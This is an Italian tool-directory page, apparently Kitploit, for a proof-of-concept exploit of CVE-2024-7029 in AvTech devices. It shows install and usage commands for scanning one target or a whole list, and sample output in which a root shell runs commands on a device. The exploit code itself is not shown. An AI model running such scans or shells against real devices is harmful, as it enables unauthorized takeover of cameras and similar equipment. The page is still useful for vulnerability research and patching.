Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-7029 — Un exploit PoC per la vulnerabilità CVE-2024-7029 trovata nei dispositivi AvTech, che consente l'esecuzione di codice remoto (RCE) | Kitploit
Strumenti/GitHubGitHub/geniuszly/cve-2024-7029
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

Un exploit PoC per la vulnerabilità CVE-2024-7029 trovata nei dispositivi AvTech, che consente l'esecuzione di codice remoto (RCE)

Vedi Repository
91 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

IT

GenAvTechRCEExploit Un exploit PoC per la vulnerabilità CVE-2024-7029 riscontrata nei dispositivi AvTech, che consente l'esecuzione remota di codice (RCE). Questo strumento può scansionare i dispositivi vulnerabili ed eseguire comandi su di essi in modo interattivo.

Caratteristiche

  • Rilevamento della vulnerabilità: Verifica se i dispositivi AvTech sono vulnerabili a RCE.
  • Shell interattiva: Esegue comandi sul dispositivo target tramite una shell interattiva.
  • Scansione multithread: Scansiona più target contemporaneamente usando il multithreading.
  • Esecuzione del payload: Sfrutta i target inviando payload appositamente predisposti per eseguire comandi in remoto.

Requisiti

  • Python 3.7+
  • Libreria requests
  • Libreria prompt_toolkit
  • Libreria alive_progress

Installa le librerie richieste con:

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Scansione di un singolo target

Per verificare la vulnerabilità di un singolo target e avviare una shell interattiva:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

Sostituisci <target_url> con l'URL effettivo del dispositivo target.

Scansione di più target

Per scansionare più target forniti in un file (un URL per riga):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

Sostituisci <file_path> con il percorso del file contenente gli URL dei target.

Thread (thread)

Puoi specificare il numero di thread per la scansione con l'opzione -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

Per impostazione predefinita, il numero di thread è impostato a 10.

Esempio

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
Scarica lo strumento